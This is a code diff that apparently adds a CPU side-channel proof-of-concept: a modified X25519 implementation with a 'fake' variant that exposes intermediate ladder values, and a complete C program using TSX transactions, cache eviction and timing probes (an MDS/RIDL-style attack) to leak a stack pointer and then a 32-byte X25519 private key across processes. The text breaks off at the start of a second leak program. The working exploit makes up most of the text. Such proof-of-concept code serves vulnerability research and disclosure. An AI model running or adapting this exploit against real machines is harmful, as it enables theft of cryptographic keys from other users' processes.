+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry1 = (s1 + (1 << 20)) >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry11 = s11 >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  s[0] = s0 >> 0;
+  s[1] = s0 >> 8;
+  s[2] = (s0 >> 16) | (s1 << 5);
+  s[3] = s1 >> 3;
+  s[4] = s1 >> 11;
+  s[5] = (s1 >> 19) | (s2 << 2);
+  s[6] = s2 >> 6;
+  s[7] = (s2 >> 14) | (s3 << 7);
+  s[8] = s3 >> 1;
+  s[9] = s3 >> 9;
+  s[10] = (s3 >> 17) | (s4 << 4);
+  s[11] = s4 >> 4;
+  s[12] = s4 >> 12;
+  s[13] = (s4 >> 20) | (s5 << 1);
+  s[14] = s5 >> 7;
+  s[15] = (s5 >> 15) | (s6 << 6);
+  s[16] = s6 >> 2;
+  s[17] = s6 >> 10;
+  s[18] = (s6 >> 18) | (s7 << 3);
+  s[19] = s7 >> 5;
+  s[20] = s7 >> 13;
+  s[21] = s8 >> 0;
+  s[22] = s8 >> 8;
+  s[23] = (s8 >> 16) | (s9 << 5);
+  s[24] = s9 >> 3;
+  s[25] = s9 >> 11;
+  s[26] = (s9 >> 19) | (s10 << 2);
+  s[27] = s10 >> 6;
+  s[28] = (s10 >> 14) | (s11 << 7);
+  s[29] = s11 >> 1;
+  s[30] = s11 >> 9;
+  s[31] = s11 >> 17;
+}
+static void x25519_scalar_mult_generic(uint8_t out[32],
+                                       const uint8_t scalar[32],
+                                       const uint8_t point[32]) {
+  fe x1, x2, z2, x3, z3, tmp0, tmp1;
+  fe_loose x2l, z2l, x3l, tmp0l, tmp1l;
+  uint8_t e[32];
+  OPENSSL_memcpy(e, scalar, 32);
+  e[0] &= 248;
+  e[31] &= 127;
+  e[31] |= 64;
+  // The following implementation was transcribed to Coq and proven to
+  // correspond to unary scalar multiplication in affine coordinates given that
+  // x1 != 0 is the x coordinate of some point on the curve. It was also checked
+  // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2
+  // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the
+  // underlying field, so it applies to Curve25519 itself and the quadratic
+  // twist of Curve25519. It was not proven in Coq that prime-field arithmetic
+  // correctly simulates extension-field arithmetic on prime-field values.
+  // The decoding of the byte array representation of e was not considered.
+  // Specification of Montgomery curves in affine coordinates:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Spec/MontgomeryCurve.v#L27>
+  // Proof that these form a group that is isomorphic to a Weierstrass curve:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/AffineProofs.v#L35>
+  // Coq transcription and correctness proof of the loop (where scalarbits=255):
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L118>
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L278>
+  // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0
+  fe_frombytes(&x1, point);
+  fe_1(&x2);
+  fe_0(&z2);
+  fe_copy(&x3, &x1);
+  fe_1(&z3);
+  unsigned swap = 0;
+  int pos;
+  for (pos = 254; pos >= 0; --pos) {
+    // loop invariant as of right before the test, for the case where x1 != 0:
+    //   pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero
+    //   let r := e >> (pos+1) in the following equalities of projective points:
+    //   to_xz (r*P)     === if swap then (x3, z3) else (x2, z2)
+    //   to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3)
+    //   x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P)
+    unsigned b = 1 & (e[pos / 8] >> (pos & 7));
+    swap ^= b;
+    fe_cswap(&x2, &x3, swap);
+    fe_cswap(&z2, &z3, swap);
+    swap = b;
+    // Coq transcription of ladderstep formula (called from transcribed loop):
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L89>
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L131>
+    // x1 != 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L217>
+    // x1  = 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L147>
+    fe_sub(&tmp0l, &x3, &z3);
+    fe_sub(&tmp1l, &x2, &z2);
+    fe_add(&x2l, &x2, &z2);
+    fe_add(&z2l, &x3, &z3);
+    fe_mul_tll(&z3, &tmp0l, &x2l);
+    fe_mul_tll(&z2, &z2l, &tmp1l);
+    fe_sq_tl(&tmp0, &tmp1l);
+    fe_sq_tl(&tmp1, &x2l);
+    fe_add(&x3l, &z3, &z2);
+    fe_sub(&z2l, &z3, &z2);
+    fe_mul_ttt(&x2, &tmp1, &tmp0);
+    fe_sub(&tmp1l, &tmp1, &tmp0);
+    fe_sq_tl(&z2, &z2l);
+    fe_mul121666(&z3, &tmp1l);
+    fe_sq_tl(&x3, &x3l);
+    fe_add(&tmp0l, &tmp0, &z3);
+    fe_mul_ttt(&z3, &x1, &z2);
+    fe_mul_tll(&z2, &tmp1l, &tmp0l);
+  }
+  // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2)
+  fe_cswap(&x2, &x3, swap);
+  fe_cswap(&z2, &z3, swap);
+  fe_invert(&z2, &z2);
+  fe_mul_ttt(&x2, &x2, &z2);
+  fe_tobytes(out, &x2);
+}
+static void x25519_scalar_mult(uint8_t out[32], const uint8_t scalar[32],
+                               const uint8_t point[32]) {
+#if defined(BORINGSSL_X25519_NEON)
+  if (CRYPTO_is_NEON_capable()) {
+    x25519_NEON(out, scalar, point);
+    return;
+  }
+#endif
+  x25519_scalar_mult_generic(out, scalar, point);
+}
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]) {
+#if defined(BORINGSSL_X25519_NEON)
+  if (CRYPTO_is_NEON_capable()) {
+    static const uint8_t kMongomeryBasePoint[32] = {9};
+    x25519_NEON(out_public_value, private_key, kMongomeryBasePoint);
+    return;
+  }
+#endif
+  uint8_t e[32];
+  OPENSSL_memcpy(e, private_key, 32);
+  e[0] &= 248;
+  e[31] &= 127;
+  e[31] |= 64;
+  ge_p3 A;
+  x25519_ge_scalarmult_base(&A, e);
+  // We only need the u-coordinate of the curve25519 point. The map is
+  // u=(y+1)/(1-y). Since y=Y/Z, this gives u=(Z+Y)/(Z-Y).
+  fe_loose zplusy, zminusy;
+  fe zminusy_inv;
+  fe_add(&zplusy, &A.Z, &A.Y);
+  fe_sub(&zminusy, &A.Z, &A.Y);
+  fe_loose_invert(&zminusy_inv, &zminusy);
+  fe_mul_tlt(&zminusy_inv, &zplusy, &zminusy_inv);
+  fe_tobytes(out_public_value, &zminusy_inv);
+}
+
+void X25519_fake(uint8_t out[32],
+                                       const uint8_t scalar[32],
+                                       const uint8_t point[32],
+                                       int iteration) {
+  fe x1, x2, z2, x3, z3, tmp0, tmp1;
+  fe_loose x2l, z2l, x3l, tmp0l, tmp1l;
+
+  uint8_t e[32];
+  OPENSSL_memcpy(e, scalar, 32);
+  e[0] &= 248;
+  e[31] &= 127;
+  e[31] |= 64;
+
+  // The following implementation was transcribed to Coq and proven to
+  // correspond to unary scalar multiplication in affine coordinates given that
+  // x1 != 0 is the x coordinate of some point on the curve. It was also checked
+  // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2
+  // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the
+  // underlying field, so it applies to Curve25519 itself and the quadratic
+  // twist of Curve25519. It was not proven in Coq that prime-field arithmetic
+  // correctly simulates extension-field arithmetic on prime-field values.
+  // The decoding of the byte array representation of e was not considered.
+  // Specification of Montgomery curves in affine coordinates:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Spec/MontgomeryCurve.v#L27>
+  // Proof that these form a group that is isomorphic to a Weierstrass curve:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/AffineProofs.v#L35>
+  // Coq transcription and correctness proof of the loop (where scalarbits=255):
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L118>
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L278>
+  // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0
+  fe_frombytes(&x1, point);
+  fe_1(&x2);
+  fe_0(&z2);
+  fe_copy(&x3, &x1);
+  fe_1(&z3);
+
+  unsigned swap = 0;
+  int pos;
+  for (pos = 254; pos >= 0; --pos) {
+    // loop invariant as of right before the test, for the case where x1 != 0:
+    //   pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero
+    //   let r := e >> (pos+1) in the following equalities of projective points:
+    //   to_xz (r*P)     === if swap then (x3, z3) else (x2, z2)
+    //   to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3)
+    //   x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P)
+    unsigned b = 1 & (e[pos / 8] >> (pos & 7));
+    swap ^= b;
+    fe_cswap(&x2, &x3, swap);
+    fe_cswap(&z2, &z3, swap);
+    swap = b;
+    // Coq transcription of ladderstep formula (called from transcribed loop):
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L89>
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L131>
+    // x1 != 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L217>
+    // x1  = 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L147>
+    fe_sub(&tmp0l, &x3, &z3);
+    fe_sub(&tmp1l, &x2, &z2);
+    fe_add(&x2l, &x2, &z2);
+    fe_add(&z2l, &x3, &z3);
+    fe_mul_tll(&z3, &tmp0l, &x2l);
+    fe_mul_tll(&z2, &z2l, &tmp1l);
+    fe_sq_tl(&tmp0, &tmp1l);
+    fe_sq_tl(&tmp1, &x2l);
+    fe_add(&x3l, &z3, &z2);
+    fe_sub(&z2l, &z3, &z2);
+    fe_mul_ttt(&x2, &tmp1, &tmp0);
+    fe_sub(&tmp1l, &tmp1, &tmp0);
+    fe_sq_tl(&z2, &z2l);
+    fe_mul121666(&z3, &tmp1l);
+    fe_sq_tl(&x3, &x3l);
+    fe_add(&tmp0l, &tmp0, &z3);
+    fe_mul_ttt(&z3, &x1, &z2);
+  if (pos == iteration) {
+      memcpy(out, &z3, 40);
+      return;
+  }
+    fe_mul_tll(&z2, &tmp1l, &tmp0l);
+  }
+  // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2)
+  fe_cswap(&x2, &x3, swap);
+  fe_cswap(&z2, &z3, swap);
+
+  fe_invert(&z2, &z2);
+  fe_mul_ttt(&x2, &x2, &z2);
+  fe_tobytes(out, &x2);
+}
diff --git a/pocs/cpus/mds-x25519/leak_evict_x25519.c b/pocs/cpus/mds-x25519/leak_evict_x25519.c
new file mode 100644
index 00000000..414aba5e
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_evict_x25519.c
@@ -0,0 +1,464 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#ifndef EVICT
+#define EVICT 24
+#endif
+
+#define CACHE_MISS 150
+
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"CPUID\n\t"
+      "mfence\n\t"
+      "RDTSCP\n\t"
+      "mov rdx, [%1]\n\t"
+      "mov rbx, rax\n\t"
+      "RDTSCP\n\t"
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+      //"mfence\n\t"
+
+      : "=b" (diff)
+      : "b"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x780000000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+const unsigned long evict_addr = 0x340000000;
+char *evict = (char*) evict_addr;
+
+
+// Offset up to 4096 - be aware of boundaries on cache lines though!
+static int ridl_confirm(unsigned long off, unsigned long prefix, size_t mask, unsigned int rol) {
+  if ((off & 0x3f) > 0x38) {
+    printf("\n\nERROR\n");
+    printf("Trying RIDL on cross-cacheline offset!\n\n");
+    exit(1);
+  }
+  _mm_clflush(probe1);
+  _mm_mfence();
+
+  // Evict target cache line - code works without it, but much worse.
+  volatile int sum = 0;
+  for (int i = 0; i < EVICT; i++) {
+    sum += ((volatile char*)evict_addr)[i*4096+(off&4095)];
+  }
+  asm volatile(
+      "mov ecx, %4\n\t"
+      //"mov r15, 16\n\t"
+      "mov r14, %2\n"
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "clflush [%0 + 256]\n\t"
+      "xbegin 2f\n\t"
+
+      //xbegin block:
+      "mov   rax, [%0]\n\t"
+      "xor   rax, %1\n\t"
+      "and rax, %3\n\t"
+      "rol rax, cl\n\t" // Doesn't matter too much, [10:50]
+      "prefetchnta [rax+r14]\n"
+
+      "xend\n\t"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3+(off&0x3f)), "r"(prefix), "r"(probe1), "r"(mask), "r"(rol)
+      : "rbx", "rax", "rcx", "rdx", "r15", "r14");
+
+  if (is_cached(probe1)) { return 0; }
+  return -1;
+}
+
+
+void map() {
+  if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, 4096);
+  if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, 4096);
+  if (mmap(evict, 4096*4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != evict) {
+    err(1, "mmap(evict)");
+  }
+  memset(evict, 0x99, 4096*4096);
+}
+
+void print_secret(unsigned char* secret, int up_to) {
+  printf("Secret:");
+  for (int i = 0; i <= up_to; i++) {
+    printf(" %02x", secret[i]);
+  }
+  for (int i = up_to + 1; i < 32; i++) {
+    printf(" ??");
+  }
+  printf("\n");
+}
+
+typedef struct pair {unsigned short i; unsigned short cnt;} pair;
+
+int cmp(const void* a, const void* b) {
+  const pair* pa = a;
+  const pair* pb = b;
+  if (pa->cnt > pb->cnt) return -1;
+  if (pa->cnt < pb->cnt) return 1;
+  return 0;
+}
+
+void print_results(unsigned short *results) {
+  pair pairs[256];
+  for (int i = 0; i < 256; i++) {
+    pairs[i].i = i;
+    pairs[i].cnt = results[i];
+  }
+  qsort(pairs, 256, sizeof(*pairs), cmp);
+  int nonzero = 0;
+  for (size_t c = 0; c < 256; ++c) {
+    if (pairs[c].cnt > 0) {
+      nonzero++;
+    }
+  }
+  const int TOPN = 25;
+  for (size_t c = 0; c < TOPN; ++c) {
+    if (pairs[c].cnt > 0) {
+      printf("%05u: %02x\n", pairs[c].cnt, (unsigned int)pairs[c].i);
+    }
+  }
+  if (nonzero > TOPN) {
+    printf("[%d small skipped]\n", nonzero - TOPN);
+  }
+}
+
+void print_results3(unsigned short* results) {
+  pair pairs[512];
+  for (int i = 0; i < 512; i++) {
+    pairs[i].i = i;
+    pairs[i].cnt = results[i];
+  }
+  qsort(pairs, 512, sizeof(*pairs), cmp);
+  int nonzero = 0;
+  for (size_t c = 0; c < 512; ++c) {
+    if (pairs[c].cnt > 0) {
+      nonzero++;
+    }
+  }
+  const int TOPN = 25;
+  for (size_t c = 0; c < TOPN; ++c) {
+    if (pairs[c].cnt > 0) {
+      printf("%05u: %03x\n", pairs[c].cnt, (unsigned int)pairs[c].i<<3);
+    }
+  }
+  if (nonzero > TOPN) {
+    printf("[%d small skipped]\n", nonzero - TOPN);
+  }
+}
+
+int get_best(unsigned short *results) {
+  ssize_t best_cnt = -1e9;
+  int best_ind = 0;
+  for (int i = 0; i < 256; i++) {
+    if (results[i] > best_cnt) {
+      best_cnt = results[i];
+      best_ind = i;
+    }
+  }
+  return best_ind;
+}
+
+#define BITS_AT_A_TIME 2
+ssize_t leak_and_move(size_t* prefix, size_t* mask, size_t mask_off, size_t off, int rol) {
+  *mask |= ((1ull << BITS_AT_A_TIME) - 1) << mask_off;
+
+  unsigned short results[256] = {0};
+  for (int i = 0; i < 1000000; i++) {
+    /*if (i == 2000000) {
+      int best = get_best(results);
+      if (results[best] < 20) {
+        printf("Weak signal...\n");
+        return -1;
+      }
+    }*/
+    if (i % 256 == 0) {
+      // Quick check.
+      int bestfor = get_best(results);
+      int is_ok = 1;
+      for (int j = 0; j < (1<<BITS_AT_A_TIME); j++) {
+        if (j == bestfor) continue;
+        // If only 1's are leaked:
+        // 20 1's, 0 0's is the threshold
+        // If the ratio is roughly constant:
+        // Must be 3x as many 1's
+        if ((results[bestfor] + 10) * 100 / (results[j] + 10) < 300) {
+          is_ok = 0;
+        }
+      }
+      if (is_ok) {
+        printf("Quick stop threshold reached.\n");
+        break;
+      }
+    }
+    for (size_t nibble = 0; nibble < (1<<BITS_AT_A_TIME); nibble++) {
+      size_t this_prefix = *prefix | (nibble << mask_off);
+      int byte = ridl_confirm(off, this_prefix, *mask, rol);
+      if (byte == -1) {
+        continue;
+      }
+      results[nibble]++;
+      printf(".");
+      fflush(stdout);
+    }
+  }
+
+  printf("\n\n");
+  print_results(results);
+  printf("\n");
+  size_t best = get_best(results);
+  if (results[best] < 20) {
+    printf("Signal lost\n");
+    return -1;
+  }
+  *prefix |= best << mask_off;
+  return best;
+}
+
+size_t stage1() {
+  printf("Step 1: Find cache line offset\n");
+  size_t prefix = 0x0000001a66666666ull;
+  size_t mask   = 0x000fFFFFffffFFFFull;
+  // Jumping by 8 due to stack alignment (I think 16 would be fine too).
+  //for (int offset = 0x4; offset <= 0x40 - 8; offset += 8) {
+  unsigned short results[256] = {0};
+  for (int i = 0; i < 1000000; i++) {
+    for (int offset = 0xa; offset <= 0x40 - 8; offset += 16) {
+      int byte = ridl_confirm(offset, prefix, mask, 15);
+      if (byte != -1) {
+        results[offset]++;
+        printf(".");
+        fflush(stdout);
+      }
+    }
+  }
+  printf("\n");
+  print_results(results);
+  size_t best_offset = get_best(results);
+  if (results[best_offset] == 0) {
+    printf("FAILED\n");
+    exit(1);
+  }
+  printf("Best offset: 0x%02x with cnt = %d\n", best_offset, results[best_offset]);
+  printf("\n\n");
+  return best_offset;
+}
+
+size_t stage2(size_t off) {
+  printf("Step 2: Leak stack pointer\n");
+  size_t prefix = 0x0000001a66666666ull;
+  size_t mask   = 0x000fFFFFffffFFFFull;
+  int rol = 32;
+  for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) {
+    leak_and_move(&prefix, &mask, 52 + nib_ind * BITS_AT_A_TIME, off, rol);
+  }
+  unsigned long long saved_rbp = prefix >> 48;
+  printf("\n\n");
+  printf("Result: stack pointer = 0x%zx\n", saved_rbp);
+  if (((off + 0x36) & 0x3f) != (saved_rbp & 0x3f)) {
+    printf("ERROR: rbp not at expected offset, memory layout might have changed since exploit development.\n");
+    exit(1);
+  }
+  return saved_rbp;
+}
+
+int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret);
+void stage5(size_t secret_offset, unsigned char* secret);
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  printf("Step 3: Guess 5 bits of secret.\n");
+  printf("Leaking at offset = 0x%zx, prefix = 0xXYZ0000\n", secret_offset - 2);
+
+  size_t best_guess = 0;
+  unsigned char best_guess_byte = 0;
+  size_t best_score = 0;
+
+#define STAGE3_START 0
+#define STAGE3_END (1<<8)
+//#define STAGE3_START 0xe80
+//#define STAGE3_END   0xe88
+  static unsigned char potential_secrets[0x1000][32];
+  int leaked_secrets = 0;
+  int scorecnt = 0;
+  size_t off = secret_offset-2;
+  size_t mask = 0x00ffFFF8;
+#define REPS3 100000
+
+  unsigned short results[1<<9] = {0};
+  int iter = 0;
+  while (1) {
+    printf("iter=%d\n", ++iter);
+    for (int i = 0; i < leaked_secrets; i++) {
+      print_secret(potential_secrets[i], 31);
+    }
+    for (size_t guess = STAGE3_START; guess < STAGE3_END; guess += 1<<3) {
+      if (guess == 0) continue;
+      if (results[guess>>3] >= 0xfffeu) continue;
+      for (int times = 0; times < REPS3; times++) {
+        size_t prefix = (guess << 16) | 0x8; // This 0x8 is guessed...
+        int byte = ridl_confirm(off, prefix, mask, 23);
+        if (byte != -1 && results[guess>>3] < 0xfffeu) {
+          results[guess>>3]++;
+        }
+      }
+    }
+    print_results3(results);
+    for (int i = 0; i < (1<<9); i++) {
+      if (results[i] < 10 || results[i] == 0xffffu) continue;
+      size_t guess = i << 3;
+      printf("Trying guess = %04x.\n", guess);
+      results[i] = 0xffff;
+      // One last check: does leaking from off + 0x140 we have similar leakage.
+      int normal = 0;
+      int fake = 0;
+      for (int k = 0; k < iter*10; k++) {
+        printf("Precheck: %d/%d...\n", k, iter*10);
+        for (int j = 0; j < REPS3; j++) {
+          size_t prefix = (guess << 16) | 0x8;
+          int byte = ridl_confirm(off, prefix, mask, 23);
+          if (byte != -1) {
+            normal++;
+          }
+        }
+        for (int j = 0; j < REPS3; j++) {
+          size_t prefix = (guess << 16) | 0x8;
+          int byte = ridl_confirm(off + 0x140, prefix, mask, 23);
+          if (byte != -1) {
+            fake++;
+          }
+        }
+      }
+      // Expecting normal~100, fake~0
+      int ratio = (normal+10)*100/(fake+10);
+      printf("Preliminary check: normal %d; fake %d - ratio = %d\n", normal, fake, ratio);
+
+      if (ratio < 300) {
+        printf("Ratio too weak, ignoring.\n");
+        continue;
+      }
+      char* secret = potential_secrets[leaked_secrets & 0xfff];
+      leaked_secrets++;
+      int rv = stage4(guess, secret_offset, secret);
+      if (rv == 0) {
+        leaked_secrets--;
+        continue;
+      }
+      stage5(secret_offset, secret);
+      // From the boringssl code:
+      // e[31] &= 127;
+      // e[31] |= 64;
+      if ((secret[31] & 128) != 0 || (secret[31] & 64) != 64) {
+        printf("We leaked something, but it doesn't match the key format.\n");
+        leaked_secrets--;
+        continue;
+      }
+    }
+  }
+}
+
+int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret) {
+  printf("\nStage 4: Leak secret[:6].\n");
+
+  size_t mask = 0x0000ffFFF8;
+  size_t prefix = (best_guess << 16) | 0x8; // This 0x8 is guessed...
+
+  memset(secret, 0, 32);
+  secret[0] = best_guess & 0xff;
+  secret[1] = best_guess >> 8;
+
+  int rol = 32;
+  for (int ind = 1; ind < 6; ind++) {
+    if (rol > 0) {
+      rol -= 8;
+    }
+    size_t off = secret_offset - 2;
+    for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) {
+      //if (ind == 1 && nib_ind < 4 / BITS_AT_A_TIME) { continue; }
+      printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n",
+             off, ind, nib_ind, prefix, mask);
+      ssize_t best = leak_and_move(&prefix, &mask, 16+ind*8+nib_ind*BITS_AT_A_TIME,
+                            off, rol);
+      if (best == -1) return 0;
+      secret[ind] |= best << (nib_ind * BITS_AT_A_TIME);
+    }
+    print_secret(secret, ind);
+  }
+  return 1;
+}
+
+void stage5(size_t secret_offset, unsigned char* secret) {
+  printf("\nStage 5: Leak secret[6:].\n");
+
+  size_t prefix = 0;
+  for (int i = 0; i < 6; i++) {
+    prefix |= ((size_t)secret[i]) << (8*i+8);
+  }
+
+  int rol = 56;
+  for (int ind = 6; ind < 32; ind++) {
+    size_t mask = 0x00ffFFFFffffFFFFull;
+    size_t off = secret_offset - 7 + ind;
+    for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) {
+      printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n",
+             off, ind, nib_ind, prefix, mask);
+      ssize_t best = leak_and_move(&prefix, &mask, 56 + nib_ind * BITS_AT_A_TIME,
+                            off, 56);
+      if (best == -1) return;
+      secret[ind] |= best << (nib_ind * BITS_AT_A_TIME);
+    }
+    print_secret(secret, ind);
+    prefix >>= 8;
+  }
+}
+
+void run() {
+  map();
+
+  size_t cache_line_offset = stage1();
+  size_t saved_rbp = stage2(cache_line_offset);
+  size_t secret_offset = (saved_rbp + 0xa0) & 0xfffu;
+  printf("Secret offset = 0x%zx\n", secret_offset);
+  printf("\n\n");
+
+  // Stage 3 calls stage 4 and 5
+  stage3(secret_offset, saved_rbp);
+}
+
+int main() {
+  run();
+
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/leak_intermediate_x25519.c b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c
new file mode 100644
index 00000000..68e18317
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c
@@ -0,0 +1,310 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
